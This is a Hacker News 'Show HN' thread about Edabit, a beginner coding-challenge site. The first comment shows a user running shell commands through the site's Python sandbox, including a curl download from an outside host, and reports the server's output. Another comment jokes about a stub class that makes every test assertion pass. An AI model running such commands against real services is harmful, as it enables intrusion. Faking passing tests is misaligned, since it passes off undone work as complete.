
Show HN: Edabit – Like Duolingo for Learning to Code - Method-X
https://edabit.com/challenges
======
xtrapolate
Good job. However, I was able to run the following on your machine (on the
publicly available demo page):

def hello(): import os print(os.system("whoami")) print(os.system("hostname"))
print(os.system("curl [http://redacted/](http://redacted/) > ./owned.txt"))
print(os.system("curl -s
[http://whatismyip.akamai.com/")](http://whatismyip.akamai.com/"\)))
print(os.system("cat ./owned.txt")) print(os.system("ping -c 1 8.8.8.8"))

Results:

codewarrior 5a8eb7db8f0e 162.243.103.238 PING 8.8.8.8 (8.8.8.8) 56(84) bytes
of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=123 time=0.668 ms \--- 8.8.8.8
ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time
0ms rtt min/avg/max/mdev = 0.668/0.668/0.668/0.000 ms

162.243.103.238 is a DigitalOcean address. My server's log indicates the curl
command actually pulled the file. Please secure your services or they _will_
be abused by wrong doers. In all honesty, I would advise to take the entire
service down until this is fully mitigated.

~~~
procinct
I can’t help but feel that posting this in a HN comment when they’re showing
off the site isn’t exactly responsible disclosure.

~~~
dqpb
I disagree. I see HN as a community of people involved in similar pursuits,
and demonstrating issues like this publicly is educational for everyone.

~~~
DavideNL
Sure, but you can "demonstrate" the details after it's fixed.

~~~
SlowRobotAhead
Seems like a lot of damage could have been obviously omitted by just removing
anything os.system(), which for the purpose (not effect here) of Duolingo
style education should have been just fine.

I get your point and the other guy’s too. I line up on the side that
disclosures should be messy and embarrassing sometimes, as incentive to really
think about what you are doing. The danger here is low.

------
css
I just reverse image searched all three of their testimonial photos all all
come from random .edu faculty pages with completely different names. They also
show up on random Twitter profiles and bandcamp pages. Not sure why they’re
using fake testimonial photos but that seems rather scummy.

~~~
shortcord
I’m confused as to how anyone would think this is alright to do.

~~~
RickS
Some people willingly submit photos to be used in this manner[0], which will
lead to them being used all over the place.

Once you've seen this picture of Brad Frost[1] (a web tech personality), it's
hilarious how many startup landing page mockups he appears in. I've personally
seen dozens.

[0] [https://uifaces.co/](https://uifaces.co/)

[1]
[https://avatars3.githubusercontent.com/u/383701?s=460&v=4](https://avatars3.githubusercontent.com/u/383701?s=460&v=4)

------
yjhoney
Having taught people coding for awhile, I don't think the step-by-step
teaching models work with coding. It creates an environment where students
just think about the next step without internalizing what they learned. I've
met students who have gone through freecodecamp's exercises and really
struggle with using what they learned.

Edabit seems too heavily on algorithms. I've seen many beginner students get
quickly burned out from doing algorithms when starting out.

I've found the most effective way to teach coding is to make their learning
project based (very much like how professors taught concepts back in college).
Build X, Y, Z, each project building up in complexity so students can think
about different combinations of everything they learned to complete the
project.

~~~
plumdot
How do you teach? As an instructor at a school or tutoring on the side?

~~~
yjhoney
I work with my local library to hold coding office hours

(Should be very easy to set up, they really want to become more technically
savvy but the only volunteers they could find is instructors trying to teach
microsoft word)

I have my own curriculum that I've built over the years and the students
ultimately end up building a product that they launch (hopefully). This year I
got to teach 20 students and so far 14 have gotten full time jobs as software
engineers. Fortunately, students who got jobs are all doing well at their jobs
so its pretty easy to refer people in.

After the remaining 6 students get a full time job, I plan to open source my
curriculum that students have helped polish over the years. You can find the
gist of it at c0d3.com

~~~
josepi_
This looks awesome! Any way I can get an invite code?

~~~
yjhoney
shoot me an email song at garagescript.org

------
derReineke
So far what I gathered from the comments:

* Not the most secure * A fork of code wars. * Has random photos for testimonials. * W3schools links. *How is it like Duolingo at all?

~~~
MetalGuru
Seriously. Yet it's at the top of HN with 150 upvotes. OP posted this twice
already and it got 5 and 6 upvotes. Either HN readers are becoming less
discerning or this guy gamed upvotes. Judging by the fact that the
testimonials feels dishonest, I wouldn't discount the latter.

------
anonytrary
I don't understand how this is different from Hackerrank/Leetcode or how it's
similar to Duolingo. Can someone explain what the innovation is here over
HackerRank or LeetCode?

~~~
olooney
The claim of similarity to Duolingo seems to be based on the "Practice" tab,
which let's you re-solve problems you've already solved once. Duolingo and
similar apps use spaced repetition[1] to reinforce lessons which is proven to
help retain them permanently in long term memory. However Edabit doesn't seem
to implement a very complete system so it probably won't be particularly
effective. I also doubt space repetition is helpful for learning to program
outside of memorizing APIs and standard libraries, which is 10% of programming
at most.

[1]:
[https://en.wikipedia.org/wiki/Spaced_repetition](https://en.wikipedia.org/wiki/Spaced_repetition)

As for sites like Leetcode, those are far more mature (wide selection of
languages, custom test cases, etc.) with much more interesting challenges. I
appears Edabit is targeting beginners and therefore has much shorter, easier
challenges which mainly test memory, not knowledge of algorithms or problem
solving. Again, not necessarily the aspect of programming that I would
encourage beginners to spend their time on compared to understanding basic
concepts.

~~~
anonytrary
This is exactly what I was looking for, thanks!

------
mxschumacher
I think w3schools related links should be removed from the Resources tab, due
to the consistent low quality of that site

~~~
reificator
While I tend to avoid w3schools in general, according to
[https://www.w3fools.com/](https://www.w3fools.com/) it's gotten better over
time.

~~~
richjdsmith
Boy do I ever have a treat for you then: [https://addons.mozilla.org/en-
US/firefox/addon/personal-bloc...](https://addons.mozilla.org/en-
US/firefox/addon/personal-blocklist/?src=search)

My search results for CSS problems are so much better now that MDN is the
first result.

~~~
hathawsh
Another way to accomplish this is to add "MDN" to all CSS and JS searches. For
example, "mdn array slice" lands right on the best documentation on array
slicing (tested on Google and DuckDuckGo).

~~~
fao_
If you use duckduckgo you can search:

    
    
        !mdn array slice
    

which will take you straight to MDN

~~~
yorwba
If you use Firefox, you can add a search keyword for MDN search, so that you
can type "mdn array slice" in the address bar and go straight to MDN without
needing DuckDuckGo to redirect you.

------
djaychela
I like this for what it is - so far, fairly simple things to do in Python. I'm
a beginning programmer (been studying about a year), so I'm happy to spend a
bit of time going through these and feel OK about passing the tests -
certainly the other 'code golf' sites that have been mentioned elsewhere in
this site have been a love/hate thing for me, with some really out-of-
character difficult exercises leading to frustration and a complete stop.

One constructive suggestion - is it possible to add auto-indenting to the
editor for Python? I hadn't realised how used to it I have become until it is
missing here...

------
rjplatte
Why don't I have the instructions and my code on the same page?

Seriously, I need all my information visible to me. What's going on here?

~~~
uberswe
My first thought too, I was trying to type in the "tip" box before I found the
code tab

~~~
rjplatte
Exactly. It's just bad UI.

------
quadrature
I really like this, great work. I might try introducing a few people to this.
specifically for python.

I went through the first python challenge and i think it might be at a
slightly higher level than a true beginner would need.

~~~
rjplatte
The Ruby exercises are good, if very basic. Solid introduction.

~~~
hnov
The way I learned Ruby 5 years ago was by doing Koans[0] which is basically a
test suite where the individual cases describe some behavior of ruby or its
stdlib and have a small expression missing to be filled in by you.

    
    
      array = [1, 2]
      array.reverse!
      assert array == __
    

[0] [http://rubykoans.com/](http://rubykoans.com/)

------
spearthrowerowl
so people will pick it up for a couple of days, and then forget about it for
weeks on end?

~~~
vaylian
Don't generalize from yourself to other people. Duolingo has been very useful
to me.

~~~
rjplatte
He's right about most people and duolingo. It's simply not hooking enough, and
most people use it exactly as described.

------
burtonator
If you guys like this you might love my project Polar:

[https://getpolarized.io/](https://getpolarized.io/)

it was also on Show HN about a month ago.

[https://news.ycombinator.com/item?id=18219960](https://news.ycombinator.com/item?id=18219960)

The idea is basically to allow you to create your OWN flashcards and sync them
with Anki with the books you're reading.

Basically you can create flashcards in the app directly and sync them to
mobile so you never forget the key points of the documentation you're reading.

Right now I'm working on the cloud version so that people can discover each
other and collaborate on building their own cards, share highlights, etc.

------
mavsman
The instructions don't load for me in Firefox so I had to open up in Chromium.
I disabled my adblocker in FF but didn't do any in-depth troubleshooting.

------
jordigh
I love that it says "ProTip". How is that different than a "tip" by now?

------
z3t4
The hardest challenges are always about Math. People good at Math also seem to
have a tendency to be good at programming though. There is however very little
Math in my daily job as a programmer.

------
jamamp
The Swift version seems to be outdated. To get the length of a String, you
need to do string.characters.count, instead of Swift 4's string.count. I think
it's on Swift 2.

~~~
saagarjha
It's Swift 3.1.

------
raywu
This has evolved! Great work. I remember seeing this a year or so ago on HN
and contributed some solutions. Back then there were only less than 20
quizzes?

------
zwaps
Website doesn't load anything with JavaScript off.

Just fyi.

------
Memosyne
Has anyone tried exercism.io for learning languages? I found it pretty
efficient as it helped me learn syntax very quickly.

------
ai_ia
Hey man. Nice App. How did you created the Mascots ? Or Outsourced it? Any
leads and cost related?

~~~
Method-X
I hired a guy on UpWork:
[https://www.upwork.com/ab/profiles/search/saved/~014198aac9a...](https://www.upwork.com/ab/profiles/search/saved/~014198aac9a56ced15/profile?sqp=true)

~~~
ai_ia
How much charge ? Can you refer the guy if possible?

~~~
Method-X
I don't remember the exact cost but the link I provided is the UpWork profile
of the guy I hired.

------
lkhatter
This is a great idea, would love to use this in the future!

------
MetalGuru
Nothing special here. Programming problems to teach beginners how to code.
Same approach practically every other site takes. Surprised by the amount of
upvotes.

------
moftz
just insert this before every function:

    
    
      class Test:
          def assert_equals(*args):
              return True

~~~
always_good
Why not go a step further and pat yourself on the back for completing all the
challenges without even navigating to the website?

------
jackiejoe88
Catch that "Silence Donald Trump!" exercise in their demo?

------
mxschumacher
submitting / result checking takes a long time

~~~
Method-X
Lots of people using the site right now. Usually it's very fast.

~~~
allenu
It sounds like the validation should be running on the client side and not in
the cloud.

~~~
Method-X
All code is executed in a docker container and destroyed after runtime
completes (or times out). It's _also_ being run on a remote server completely
unrelated to the functioning of the web app itself. The "security issues"
pointed out in this thread are non-issues.

------
blondie9x
codewars.com already does this I believe.

~~~
moftz
The README.md inside of the directory where your code runs says it is running
codewars

------
gammateam
so you'll get a bunch of random things to memorize with no explanation of the
concepts supporting them?

~~~
crispyambulance
I think the key thing is that these are exercises. People learn by seeing
examples and solving problems with gradually increasing difficultly. This
appears to be an arena for doing just that.

Concepts and theory are certainly critical, but one needs to practice in order
to achieve mastery. The conceptual framework for all this stuff is covered in
detail in other resources, anyway.

After taking a cursory look around, Edabit seems to be filling a very specific
need. I like it.

~~~
gammateam
I was just trying to understand the Duolingo analogy

~~~
folkrav
Duolingo by itself isn't really enough to really learn a language either.
Thanks to Duolingo, I can definitely say "the woman eats the apple" in
Italian, but I don't understand the language's grammar and its verb
conjugation rules enough to build complete sentences.

~~~
yorwba
"The woman eats the apple." is a complete sentence, no? Do you mean you only
memorized specific sentences, but did not end up with any generalizable
knowledge? I've never tried Duolingo, but I kind of expected them to not show
you exactly the same exercises again, so that you wouldn't pass them with just
memorization.

~~~
gammateam
Thats exactly what he was saying. But yes, Duolingo and Memrise take similar
approaches at not teaching you anything.

~~~
yorwba
I was hoping for an answer that explains how it is possible to pass a course
on Duolingo (i.e. answer the exercises correctly) without actually learning
enough of the language to apply it to new situations. If the problem is just
that you can memorize the answer to each question and regurgitate it when you
see the same question again, that'd be fixable by creating many more
questions. But if the problem is something else, it might not be so simple.

~~~
gammateam
Look, as you mentioned, you just don't know what you are talking about to
extrapolate what you want explained. Use Duolingo for 5 minutes like the rest
of us and get with the program.

~~~
yorwba
I did that. I took the initial test for Japanese, where I answered correctly
for sentences I already understood or where I was only missing a single word I
could guess by elimination. Given multiple options I couldn't distinguish, I
messed up as it should be.

Based on the test results, I was skipped past 23 of the 40 topics I can see in
the course. Considering that I've been learning for only three months, that
makes the course look a bit short.

When I then tried the next lesson, I did notice some questions repeating, but
there was also some variety. So I don't know whether it's possible to just
memorize all the sentences without learning grammar.

Based on me trying Duolingo a single time now, I'd now say that the biggest
problem is the small amount of topics covered in a course, which limits the
vocabulary you know how to use after completing it.

But that's not what the original complaint said, so maybe someone who's used
Duolingo 5 minutes a day for several months is still in a better position to
explain what the actual problem with Duolingo is.

~~~
gammateam
They don't explain rules. They try to classically condition you without
explaining why you would ever synthesize a word or phrase that way.

It becomes more apparent when you realize these apps are not smart. They were
novel at one point, and maybe you can pick up a phrase to catch a native
speaker off guard.

Duolingo is using humans to translate web content that algorithms are unsure
about. This is the same founder of reCaptcha, who uses captcha's to use humans
to tell robots about what the robots are unsure of.

Memrise, on the other hand, just takes the "87% most used phrases" and tries
to get you to memorize the.

They have zero holistic approach to any of the languages they offer. You will
never learn tense, language-specific concepts and rules, idioms that break all
the rules, or whatever locals just say.

